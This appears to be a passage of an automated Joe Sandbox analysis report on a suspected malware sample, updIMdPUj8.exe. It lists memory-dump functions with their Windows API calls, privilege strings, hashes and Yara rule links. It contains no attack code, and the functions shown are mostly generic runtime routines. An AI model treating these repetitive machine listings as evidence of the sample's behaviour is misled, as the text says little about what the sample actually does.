                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                                                                          • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                                                                          • API String ID: 2141747552-1753850145
                                                                                                                                                                          • Opcode ID: 7b2d81a4033eb1a50c93400966922309e87d1e3bb9a41e136e25b42870ec6292
                                                                                                                                                                          • Instruction ID: ee9183d4497a1a0de911b0bd1c705699316e327b8bbdff3c81ea7ce26a41ef10
                                                                                                                                                                          • Opcode Fuzzy Hash: 7b2d81a4033eb1a50c93400966922309e87d1e3bb9a41e136e25b42870ec6292
                                                                                                                                                                          • Instruction Fuzzy Hash: 4EE086719107129ED7219F38A85DB167AE4AF04F41F1488EDF4DA93790DAB4D5448F50
                                                                                                                                                                          Function 00B42BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AdjustPointer$_abort
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2252061734-0
                                                                                                                                                                          • Opcode ID: f98f7ee3a73d0390ac559da2a766a98c13087fa223bc002f0bb7b83e67856ad3
                                                                                                                                                                          • Instruction ID: 6d3080433e699b827e4c73aed62918eb67fc5dbaf9ca2586fa5013440a6ed815
                                                                                                                                                                          • Opcode Fuzzy Hash: f98f7ee3a73d0390ac559da2a766a98c13087fa223bc002f0bb7b83e67856ad3
                                                                                                                                                                          • Instruction Fuzzy Hash: 4451AF71900216AFDB299F14D885B7A77E4FF54310F6441A9FC01476A2D732AE40FB90
                                                                                                                                                                          Function 00B4BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00B4BF39
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B4BF5C
                                                                                                                                                                            • Part of subcall function 00B48E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00B4CA2C,00000000,?,00B46CBE,?,00000008,?,00B491E0,?,?,?), ref: 00B48E38
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00B4BF82
                                                                                                                                                                          • _free.LIBCMT ref: 00B4BF95
                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B4BFA4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 336800556-0
                                                                                                                                                                          • Opcode ID: c6db98d2e737274342a469a8cc401b91e51a9b8bc58d450a3023ce0bd6a2f02b
                                                                                                                                                                          • Instruction ID: b4997270056284ac9910984fd33fe4a23e239eed977f5ad83a7b7d83acf2aa5c
                                                                                                                                                                          • Opcode Fuzzy Hash: c6db98d2e737274342a469a8cc401b91e51a9b8bc58d450a3023ce0bd6a2f02b
                                                                                                                                                                          • Instruction Fuzzy Hash: B301D4726017117F272116BA5C9CD7B6AFDDEC2FA131401A9FA08D3200EF60CE05A5B0
                                                                                                                                                                          Function 00B49869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00B491AD,00B4B188,?,00B49813,00000001,00000364,?,00B43F73,00000050,?,00B61030,00000200), ref: 00B4986E
                                                                                                                                                                          • _free.LIBCMT ref: 00B498A3
                                                                                                                                                                          • _free.LIBCMT ref: 00B498CA
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00B61030,00000200), ref: 00B498D7
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00B61030,00000200), ref: 00B498E0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                          • Opcode ID: de8b13ed1d29176bea34fc34b48fea4709b9b27b159c85acf78debe9a60a7e3d
                                                                                                                                                                          • Instruction ID: 769a9916f2df0e53ccd153c09b54c38db738c1eb8cdfe8999b56b426f15f0d4b
                                                                                                                                                                          • Opcode Fuzzy Hash: de8b13ed1d29176bea34fc34b48fea4709b9b27b159c85acf78debe9a60a7e3d
                                                                                                                                                                          • Instruction Fuzzy Hash: 9801F4361957016BC316676C6C89A1B27EADBD2BF273502F8F525A3292EE30CF017221
                                                                                                                                                                          Function 00B30EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B311CF: ResetEvent.KERNEL32(?), ref: 00B311E1
                                                                                                                                                                            • Part of subcall function 00B311CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00B311F5
                                                                                                                                                                          • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00B30F21
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?), ref: 00B30F3B
                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?), ref: 00B30F54
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00B30F60
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00B30F6C
                                                                                                                                                                            • Part of subcall function 00B30FE4: WaitForSingleObject.KERNEL32(?,000000FF,00B31206,?), ref: 00B30FEA
                                                                                                                                                                            • Part of subcall function 00B30FE4: GetLastError.KERNEL32(?), ref: 00B30FF6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1868215902-0
                                                                                                                                                                          • Opcode ID: 6d0d10d304a376e75bcbb40f1b959e8a0da159a250d0bd55a9b66bdbe1248773
                                                                                                                                                                          • Instruction ID: 1881c912fe7a5edd3dc19b2371bb9ec3e4ea22a0d8e6d8e0dbc5775845be7b94
                                                                                                                                                                          • Opcode Fuzzy Hash: 6d0d10d304a376e75bcbb40f1b959e8a0da159a250d0bd55a9b66bdbe1248773
                                                                                                                                                                          • Instruction Fuzzy Hash: 45015271100B44EFC722AB64DC84BC6BBE9FF08B51F1009A9F15A921A0CB757A54CA50
                                                                                                                                                                          Function 00B4C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 00B4C817
                                                                                                                                                                            • Part of subcall function 00B48DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00B4C896,?,00000000,?,00000000,?,00B4C8BD,?,00000007,?,?,00B4CCBA,?), ref: 00B48DE2
                                                                                                                                                                            • Part of subcall function 00B48DCC: GetLastError.KERNEL32(?,?,00B4C896,?,00000000,?,00000000,?,00B4C8BD,?,00000007,?,?,00B4CCBA,?,?), ref: 00B48DF4
                                                                                                                                                                          • _free.LIBCMT ref: 00B4C829
                                                                                                                                                                          • _free.LIBCMT ref: 00B4C83B
                                                                                                                                                                          • _free.LIBCMT ref: 00B4C84D
                                                                                                                                                                          • _free.LIBCMT ref: 00B4C85F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: 8644c9f6e2595d6f76021dc24df7f6d5444c32c73b0825a1022fc3c482efd938
                                                                                                                                                                          • Instruction ID: 63f04694f8e8b9f510621596e62af0951fac84d5e620d5c8d2273cb6a5e4edad
                                                                                                                                                                          • Opcode Fuzzy Hash: 8644c9f6e2595d6f76021dc24df7f6d5444c32c73b0825a1022fc3c482efd938
                                                                                                                                                                          • Instruction Fuzzy Hash: 2AF06232912210AB86A4DB68E586D2A77E9EA10B1175418EDF118D7552CF70FE80DA54
                                                                                                                                                                          Function 00B31FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B31FE5
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B31FF6
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B32006
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00B32014
                                                                                                                                                                          • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00B2B371,?,?,00000000,?,?,?), ref: 00B3202F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$CompareString
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3397213944-0
                                                                                                                                                                          • Opcode ID: 1d438d6979b2a62383d7fab04458a084a96f0e07332a9550d287f6c17299e272
                                                                                                                                                                          • Instruction ID: 87446b1ff895cfeadd40afbcdcf6b3384238d6ac9fde0e79d81f76227c0a749a
                                                                                                                                                                          • Opcode Fuzzy Hash: 1d438d6979b2a62383d7fab04458a084a96f0e07332a9550d287f6c17299e272
                                                                                                                                                                          • Instruction Fuzzy Hash: 29F06D32048114BBCF261F50EC09D9E3FA6EB40B70F258085F61A5B061CB729765E6A0
                                                                                                                                                                          Function 00B48900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 00B4891E
                                                                                                                                                                            • Part of subcall function 00B48DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00B4C896,?,00000000,?,00000000,?,00B4C8BD,?,00000007,?,?,00B4CCBA,?), ref: 00B48DE2
                                                                                                                                                                            • Part of subcall function 00B48DCC: GetLastError.KERNEL32(?,?,00B4C896,?,00000000,?,00000000,?,00B4C8BD,?,00000007,?,?,00B4CCBA,?,?), ref: 00B48DF4
                                                                                                                                                                          • _free.LIBCMT ref: 00B48930
                                                                                                                                                                          • _free.LIBCMT ref: 00B48943
                                                                                                                                                                          • _free.LIBCMT ref: 00B48954
                                                                                                                                                                          • _free.LIBCMT ref: 00B48965
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: be7c7b31bfe17b42c8920d69f40bdae352468a7e9d24db59a9e0fa46fdbf137b
                                                                                                                                                                          • Instruction ID: d3eb4d900a8e90cf2b399e338558726e0bb56079bdb10e143515f297e81e1078
                                                                                                                                                                          • Opcode Fuzzy Hash: be7c7b31bfe17b42c8920d69f40bdae352468a7e9d24db59a9e0fa46fdbf137b
                                                                                                                                                                          • Instruction Fuzzy Hash: E9F0DA718116229B868A6F14FC0251D3BE1FB24725301159AF924972B1DF728B41FB81
                                                                                                                                                                          Function 00B315FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _swprintf
                                                                                                                                                                          • String ID: %ls$%s: %s
                                                                                                                                                                          • API String ID: 589789837-2259941744
                                                                                                                                                                          • Opcode ID: a89effec90cbe5ec2ff75a5966e53caf6f024824d22eaf593717c89a7f9f82db
                                                                                                                                                                          • Instruction ID: 24d653a35b3d94c546307fd6fd6dfa668cdc51ba5875e28699d2e8faaff35726
                                                                                                                                                                          • Opcode Fuzzy Hash: a89effec90cbe5ec2ff75a5966e53caf6f024824d22eaf593717c89a7f9f82db
                                                                                                                                                                          • Instruction Fuzzy Hash: D951AD75288300F6F6221ADC8DC7F3576DDAB05B04F348DC6F39A694E1DDA2A860671E
                                                                                                                                                                          Function 00B47F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\updIMdPUj8.exe,00000104), ref: 00B47FAE
                                                                                                                                                                          • _free.LIBCMT ref: 00B48079
                                                                                                                                                                          • _free.LIBCMT ref: 00B48083
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                          • String ID: C:\Users\user\Desktop\updIMdPUj8.exe
                                                                                                                                                                          • API String ID: 2506810119-3977522989
                                                                                                                                                                          • Opcode ID: fb3a1052521ae5f7cbef87c85c813532a2a13f7da55ff6a9d56e87e02ef5b78c
                                                                                                                                                                          • Instruction ID: ff9bdfba4f95e0afe2422b816dba737cd977533716a8baaab30c8b48ee00e0b2
                                                                                                                                                                          • Opcode Fuzzy Hash: fb3a1052521ae5f7cbef87c85c813532a2a13f7da55ff6a9d56e87e02ef5b78c
                                                                                                                                                                          • Instruction Fuzzy Hash: 43317EB1A00218AFDB21DF99D88599EBBF8EF95310F1040EAF90497311DB718B44EB61
                                                                                                                                                                          Function 00B431D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00B431FB
                                                                                                                                                                          • _abort.LIBCMT ref: 00B43306
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: EncodePointer_abort
                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                          • API String ID: 948111806-2084237596
                                                                                                                                                                          • Opcode ID: 97ce813cb44287ae16ed1f9679eb826be0ef4bbd0e4be1e96febce52be43fbee
                                                                                                                                                                          • Instruction ID: 24c90b4f856b4ac2ac42f247f924603f4ce8e6a0429966af6779eb12bcdff9a6
                                                                                                                                                                          • Opcode Fuzzy Hash: 97ce813cb44287ae16ed1f9679eb826be0ef4bbd0e4be1e96febce52be43fbee
                                                                                                                                                                          • Instruction Fuzzy Hash: DB415871900209AFCF15DF98CD82AAEBBF5FF48704F188099F904A7212D375AB50EB54
                                                                                                                                                                          Function 00B27401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00B27406
                                                                                                                                                                            • Part of subcall function 00B23BBA: __EH_prolog.LIBCMT ref: 00B23BBF
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00B274CD
                                                                                                                                                                            • Part of subcall function 00B27A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B27AAB
                                                                                                                                                                            • Part of subcall function 00B27A9C: GetLastError.KERNEL32 ref: 00B27AF1
                                                                                                                                                                            • Part of subcall function 00B27A9C: CloseHandle.KERNEL32(?), ref: 00B27B00
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                                                                                          • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                                                                          • API String ID: 3813983858-639343689
                                                                                                                                                                          • Opcode ID: 96704eafc6c81cded3feb43147d1b6168375a34aa23b2248bcdcc6fd6dadb71a
                                                                                                                                                                          • Instruction ID: 0882871bd9b382132ba8203ea2b1df627ca69e110d6115f9c393d013a2686b6f
                                                                                                                                                                          • Opcode Fuzzy Hash: 96704eafc6c81cded3feb43147d1b6168375a34aa23b2248bcdcc6fd6dadb71a
                                                                                                                                                                          • Instruction Fuzzy Hash: 4631E171D44268AADF11EBA8AC45BEEBBF8EF19700F0440D5F808A7292DF748A44C764
                                                                                                                                                                          Function 00B3AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B21316: GetDlgItem.USER32(00000000,00003021), ref: 00B2135A
                                                                                                                                                                            • Part of subcall function 00B21316: SetWindowTextW.USER32(00000000,00B535F4), ref: 00B21370
                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00B3AD98
                                                                                                                                                                          • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00B3ADAD
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000066,?), ref: 00B3ADC2
                                                                                                                                                                          Strings
